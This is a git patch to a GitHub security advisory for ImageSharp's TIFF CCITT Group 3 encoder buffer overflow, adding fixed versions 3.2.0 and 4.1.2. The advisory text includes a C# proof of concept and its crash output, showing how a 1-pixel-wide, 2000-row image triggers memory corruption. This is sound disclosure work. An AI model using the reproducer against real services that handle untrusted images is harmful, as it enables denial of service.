From 581a69fc699f29a7ac164b493e92016cfb849240 Mon Sep 17 00:00:00 2001 From: James Jackson-South Date: Fri, 9 Oct 2026 19:17:48 +1000 Subject: [PATCH] Improve GHSA-j9gm-c75j-xc9q --- .../GHSA-j9gm-c75j-xc9q.json | 28 +++++++++++++++---- 1 file changed, 22 insertions(+), 6 deletions(-) diff --git a/advisories/github-reviewed/2026/10/GHSA-j9gm-c75j-xc9q/GHSA-j9gm-c75j-xc9q.json b/advisories/github-reviewed/2026/10/GHSA-j9gm-c75j-xc9q/GHSA-j9gm-c75j-xc9q.json index ee634b16c1a..710a164d566 100644 --- a/advisories/github-reviewed/2026/10/GHSA-j9gm-c75j-xc9q/GHSA-j9gm-c75j-xc9q.json +++ b/advisories/github-reviewed/2026/10/GHSA-j9gm-c75j-xc9q/GHSA-j9gm-c75j-xc9q.json @@ -1,13 +1,13 @@ { "schema_version": "1.4.0", "id": "GHSA-j9gm-c75j-xc9q", - "modified": "2026-10-07T20:24:28Z", + "modified": "2026-10-07T20:24:29Z", "published": "2026-10-07T20:24:28Z", "aliases": [ "CVE-2026-106110" ], "summary": "ImageSharp: TIFF CCITT T4 encoder can write past its compressed output buffer", - "details": "### Summary\n\nImageSharp's TIFF CCITT Group 3 (T4) encoder can write beyond its allocated compressed-data buffer when encoding narrow 1-bit images. The unchecked writes can corrupt process memory and terminate the process.\n\nThis report concerns only the T4 `CcittGroup3Fax` encoder path. It replaces the prior, unrelated ICC content.\n\n### Affected package and versions\n\n- Package: `SixLabors.ImageSharp` (NuGet)\n- Affected range: `>= 2.0.0, <= 4.1.1`\n- Commit `0815358f9202a78bc7f3b83e19282dc3654b500f` corresponds to release **v4.1.1**.\n\nThe T4 encoder and its undersized buffer calculation first shipped in v2.0.0. The narrow-image exploit terminates published v2.0.0 and v4.1.1 while the same-height 64-pixel control succeeds on both. Every release through v4.1.1 retains the vulnerable allocation and unchecked bit-write structure.\n### Preconditions and impact\n\nThe affected path is reached when the application encodes 1-bit image data with `TiffCompression.CcittGroup3Fax`. This can happen when an application explicitly selects `TiffEncoder.BitsPerPixel = Bit1` and `TiffEncoder.Compression = CcittGroup3Fax`. It can also occur when an application decodes a TIFF and re-encodes it using the default `TiffEncoder`, because ImageSharp retains TIFF frame metadata including the compression and bit depth.\n\n`TiffCompressorFactory` creates `T4BitCompressor` for `CcittGroup3Fax`. `TiffCcittCompressor.Initialize` allocates `Width * rowsPerStrip` bytes, but non-modified T4 writes a 12-bit EOL before row data and an additional 12-bit EOL per row. `WriteCode` calls `BitWriterUtils.WriteBit` and `WriteZeroBit`, both of which use `Unsafe.Add` without a capacity check. Thus the encoded bit stream can exceed the allocated span.\n\nA 1-pixel-wide, 2000-row alternating bilevel image caused a fatal `System.AccessViolationException` during T4 compression. This is a memory-corruption and availability issue for applications that expose this encoding flow to attacker-controlled input.\n\n### Tested environment\n\n- Package binary: NuGet `SixLabors.ImageSharp` **4.1.1**\n- Target framework: `net8.0`\n- Runtime: .NET 8.0.30; SDK 8.0.424\n- Operating system: Debian GNU/Linux 12 (bookworm), Linux arm64, Docker\n\nNo active exploitation is known.\n\n### Reproduction\n\nIn a `net8.0` project that references the published `SixLabors.ImageSharp` 4.1.1 binary, save the following as `Program.cs`. Run `dotnet run -- exploit 2000` for the trigger and `dotnet run -- control 2000` for the control.\n\n```csharp\nusing System;\nusing System.IO;\nusing SixLabors.ImageSharp;\nusing SixLabors.ImageSharp.Formats.Tiff;\nusing SixLabors.ImageSharp.Formats.Tiff.Constants;\nusing SixLabors.ImageSharp.PixelFormats;\n\nstring mode = args.Length > 0 ? args[0] : \"exploit\";\nint width = mode == \"control\" ? 64 : 1;\nint height = args.Length > 1 ? int.Parse(args[1]) : 2000;\n\nConsole.WriteLine($\"mode={mode} width={width} height={height}\");\nusing var image = new Image(width, height);\nfor (int y = 0; y < image.Height; y++)\n for (int x = 0; x < image.Width; x++)\n image[x, y] = new L8((byte)(((x + y) & 1) == 0 ? 255 : 0));\n\nvar metadata = image.Frames.RootFrame.Metadata.GetTiffMetadata();\nmetadata.BitsPerPixel = TiffBitsPerPixel.Bit1;\nmetadata.Compression = TiffCompression.CcittGroup3Fax;\n\nusing var output = new MemoryStream();\nimage.Save(output, new TiffEncoder());\nConsole.WriteLine($\"Encoded OK: {output.Length} bytes\");\n```\n\nAgainst the published 4.1.1 package, this produced:\n\n```text\nmode=exploit width=1 height=2000\nFatal error. System.AccessViolationException: Attempted to read or write protected memory.\n at ...TiffCcittCompressor.GetWhiteTermCode(...)\n at ...T4BitCompressor.CompressStrip(...)\n```\n\nA 64-pixel-wide, 2000-row control using the same Group 3 metadata completed successfully:\n\n```text\nmode=control width=64 height=2000\nEncoded OK: 76230 bytes\n```\n\nThe direct public configuration path also triggers with:\n\n```csharp\nnew TiffEncoder\n{\n BitsPerPixel = TiffBitsPerPixel.Bit1,\n Compression = TiffCompression.CcittGroup3Fax\n};\n```", + "details": "### Patched versions\n\nFixed in ImageSharp **3.2.0** and **4.1.2**. Users on v3 should upgrade to 3.2.0; users on v4 should upgrade to 4.1.2 or later.\n\n### Summary\n\nImageSharp's TIFF CCITT Group 3 (T4) encoder can write beyond its allocated compressed-data buffer when encoding narrow 1-bit images. The unchecked writes can corrupt process memory and terminate the process.\n\nThis report concerns only the T4 `CcittGroup3Fax` encoder path. It replaces the prior, unrelated ICC content.\n\n### Affected package and versions\n\n- Package: `SixLabors.ImageSharp` (NuGet)\n- Affected ranges: `>= 2.0.0, < 3.2.0` and `>= 4.0.0, < 4.1.2`\n- Commit `0815358f9202a78bc7f3b83e19282dc3654b500f` corresponds to release **v4.1.1**.\n\nThe T4 encoder and its undersized buffer calculation first shipped in v2.0.0. The narrow-image exploit terminates published v2.0.0 and v4.1.1 while the same-height 64-pixel control succeeds on both. Every release through v4.1.1 retains the vulnerable allocation and unchecked bit-write structure.\n### Preconditions and impact\n\nThe affected path is reached when the application encodes 1-bit image data with `TiffCompression.CcittGroup3Fax`. This can happen when an application explicitly selects `TiffEncoder.BitsPerPixel = Bit1` and `TiffEncoder.Compression = CcittGroup3Fax`. It can also occur when an application decodes a TIFF and re-encodes it using the default `TiffEncoder`, because ImageSharp retains TIFF frame metadata including the compression and bit depth.\n\n`TiffCompressorFactory` creates `T4BitCompressor` for `CcittGroup3Fax`. `TiffCcittCompressor.Initialize` allocates `Width * rowsPerStrip` bytes, but non-modified T4 writes a 12-bit EOL before row data and an additional 12-bit EOL per row. `WriteCode` calls `BitWriterUtils.WriteBit` and `WriteZeroBit`, both of which use `Unsafe.Add` without a capacity check. Thus the encoded bit stream can exceed the allocated span.\n\nA 1-pixel-wide, 2000-row alternating bilevel image caused a fatal `System.AccessViolationException` during T4 compression. This is a memory-corruption and availability issue for applications that expose this encoding flow to attacker-controlled input.\n\n### Tested environment\n\n- Package binary: NuGet `SixLabors.ImageSharp` **4.1.1**\n- Target framework: `net8.0`\n- Runtime: .NET 8.0.30; SDK 8.0.424\n- Operating system: Debian GNU/Linux 12 (bookworm), Linux arm64, Docker\n\nNo active exploitation is known.\n\n### Reproduction\n\nIn a `net8.0` project that references the published `SixLabors.ImageSharp` 4.1.1 binary, save the following as `Program.cs`. Run `dotnet run -- exploit 2000` for the trigger and `dotnet run -- control 2000` for the control.\n\n```csharp\nusing System;\nusing System.IO;\nusing SixLabors.ImageSharp;\nusing SixLabors.ImageSharp.Formats.Tiff;\nusing SixLabors.ImageSharp.Formats.Tiff.Constants;\nusing SixLabors.ImageSharp.PixelFormats;\n\nstring mode = args.Length > 0 ? args[0] : \"exploit\";\nint width = mode == \"control\" ? 64 : 1;\nint height = args.Length > 1 ? int.Parse(args[1]) : 2000;\n\nConsole.WriteLine($\"mode={mode} width={width} height={height}\");\nusing var image = new Image(width, height);\nfor (int y = 0; y < image.Height; y++)\n for (int x = 0; x < image.Width; x++)\n image[x, y] = new L8((byte)(((x + y) & 1) == 0 ? 255 : 0));\n\nvar metadata = image.Frames.RootFrame.Metadata.GetTiffMetadata();\nmetadata.BitsPerPixel = TiffBitsPerPixel.Bit1;\nmetadata.Compression = TiffCompression.CcittGroup3Fax;\n\nusing var output = new MemoryStream();\nimage.Save(output, new TiffEncoder());\nConsole.WriteLine($\"Encoded OK: {output.Length} bytes\");\n```\n\nAgainst the published 4.1.1 package, this produced:\n\n```text\nmode=exploit width=1 height=2000\nFatal error. System.AccessViolationException: Attempted to read or write protected memory.\n at ...TiffCcittCompressor.GetWhiteTermCode(...)\n at ...T4BitCompressor.CompressStrip(...)\n```\n\nA 64-pixel-wide, 2000-row control using the same Group 3 metadata completed successfully:\n\n```text\nmode=control width=64 height=2000\nEncoded OK: 76230 bytes\n```\n\nThe direct public configuration path also triggers with:\n\n```csharp\nnew TiffEncoder\n{\n BitsPerPixel = TiffBitsPerPixel.Bit1,\n Compression = TiffCompression.CcittGroup3Fax\n};\n```", "severity": [ { "type": "CVSS_V3", @@ -27,15 +27,31 @@ { "introduced": "2.0.0" }, + { + "fixed": "3.2.0" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "NuGet", + "name": "SixLabors.ImageSharp" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "4.0.0" + }, { "fixed": "4.1.2" } ] } - ], - "database_specific": { - "last_known_affected_version_range": "<= 4.1.1" - } + ] } ], "references": [